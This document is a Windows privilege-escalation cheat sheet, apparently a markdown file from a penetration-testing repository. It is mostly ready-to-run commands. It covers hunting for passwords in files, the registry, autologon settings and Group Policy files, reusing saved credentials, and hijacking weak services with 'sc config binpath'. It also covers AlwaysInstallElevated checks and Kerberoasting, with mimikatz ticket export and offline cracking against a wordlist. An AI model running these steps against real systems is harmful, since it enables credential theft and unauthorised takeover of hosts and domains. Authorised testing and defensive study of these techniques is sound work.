win_EoP.md

File metadata and controls

246 lines (193 loc) · 6.39 KB

Windows EoP

System

hostname
systeminfo

#Get more precise OS information
systeminfo | findstr /b /i /c:"os version" /c:"os name" /c:"system type"

#logical disk
wmic logicaldisk get Caption ,description ,providername

Network

#network interface
ipconfig /all

#listening services and established connections
netstat -ano

#route table
route print 

#arp table
arp -a

User

whoami /all
net users
net localgroup
net user <username>
net localgroup <groupname>

Anti-virus

#windows defender
sc query windefend

Password hunting

#This command can take a long time to run.
findstr /pisn /c:"password" /c:"passwd" *.ini *.txt *.conf *.config *.php *.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
dir /b /s *pass* == *cred* == *vnc* == *.config* |findstr /vr ".*.dll"

#Searching for IIS server configuration
dir /b /s "web.config"
dir /b /s "web.config" | findstr /f:/ /i "password"

#Look for credentials stored with cmdkey, then run a command with the saved credential
cmdkey /list
c:windows\system32\runas.exe /user:<username> /savecred <command>

#Group Policy preference files
dir /s Groups.xml
findstr /s /c:"cpassword"

#Search the registry
reg query HKLM /f password /t REG_SZ /s 
reg query HKCU /f password /t REG_SZ /s

#Windows autologon
#Check both the /reg:32 and /reg:64 views; they can return different results.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query  "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /reg:64

Process

tasklist /svc

Service and scheduled task

#Scheduled task
schtasks /query /fo list /v
schtasks /query /fo list /v | findstr /c:"Task To Run:"
schtasks /query /fo list /v | findstr "TaskName"
schtasks /query /tn "<task name>" /fo list /v

#Use wmic to list services
wmic service get displayname,pathname
wmic service where Caption="<service name>" get name,caption,state,startmode

#Use PowerShell to list services
Get-WmiObject win32_service | Select-Object Name,State,PathName|?{$_.State -like "Running"}

#service controller
sc queryex type=service
sc qc <service name>

#Check the access rights on all services with accesschk.exe (-c selects services rather than files)
accesschk.exe -accepteula -ucvw "everyone" *

#configure service settings
sc config <service name> binpath= "<command>"

#Check the ACLs on the service registry keys
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

#start service 
sc start <service name>
net start <service name>

#stop service (requires administrator rights)
sc stop <service name>
net stop <service name>

Checking registry permissions

Get-Acl -path <registry path>|fl

Installed application and patch level

#Only lists applications installed through Windows Installer
wmic product get name ,version ,vendor

#Installed hotfixes
wmic qfe get Caption,Description,HotFixId,InstalledOn

File permissions

icacls.exe <Pathname>

#Find all files with weak permissions
accesschk.exe -accepteula -uws "everyone" "C:\*.*"
accesschk64.exe -accepteula -uws "Users" "C:\*.*"
accesschk64.exe -accepteula -uws "Authenticated Users" "C:\*.*"

#Find all directories with weak permissions
accesschk64.exe -accepteula -uwsd "everyone" "C:\*.*"
accesschk64.exe -accepteula -uwsd "Users" "C:\*.*"
accesschk64.exe -accepteula -uwsd "Authenticated Users" "C:\*.*"

#If accesschk.exe cannot be transferred to the host, or does not work there,
#use this PowerShell command instead.
Get-ChildItem "C:\program files" -Recurse|Get-Acl|?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}

#Check whether the startup directory is writable (less common)
#Current user
icacls.exe "C:\<Users>\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
#All users
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Locate files

where /r c:\ <filename>
#for example, bash.exe and wsl.exe (wsl.exe can be an EoP path, too)
where /r c:\ bash.exe
where /r c:\ wsl.exe

Device and driver

#Device
mountvol
#Driver
driverquery.exe /v /fo csv|ConvertFrom-Csv|Select-Object 'Display Name' ,'Start Mode','Path'
#Driver
#This is a PowerShell command
Get-WmiObject Win32_PnPSignedDriver|Select-Object DeviceName,DriverVersion,Manufacturer|?{$_.DeviceName -like "*VMware*"}

Special tricks

AlwaysInstallElevated

#If both values are 0x1, a crafted .msi file can exploit this setting.
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElvated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElvated

#Display alternate data streams of the file.
dir /r

#List all files (including subdirectories) under the current directory, excluding unwanted names
dir /s /b | findstr /r /i /v "<unwanted file>"

Firewall

#Check whether the firewall is enabled
netsh  advfirewall show currentprofile
netsh firewall show state

#Check the firewall rules
netsh advfirewall  firewall show rule name=all
netsh firewall show config

Check UAC

#Check the value of EnableLUA: if it is 1, UAC is enabled; otherwise UAC is disabled.
#Also check the value of ConsentPromptBehaviorAdmin.
#https://github.com/carlospolop/hacktricks/blob/master/windows/credentials.md#uac
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ 

Domain enumeration

#Domain user enumeration
net user /domain
net user <domain user> /domain

#Domain group enumeration
net group /domain


#Use PowerShell to gather domain information
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()


#Check for SPNs
setspn -T <domain name> -Q */*

#Request service ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"

#Export TGS tickets
mimikatz.exe "token::elevate" "privilege::debug" "kerberos::list /export" exit

#Crack the SPN account's password (only for KerbTicket Encryption Type: RSADSI RC4-HMAC(NT))
/usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt ./mssql.kirbi

Automated enumeration

windows-privesc-check2.exe

References

https://www.fuzzysecurity.com/tutorials/16.html
https://pentestlab.blog/2017/04/19/stored-credentials/
https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/README.md
https://github.com/carlospolop/hacktricks/blob/master/windows/credentials.md#uac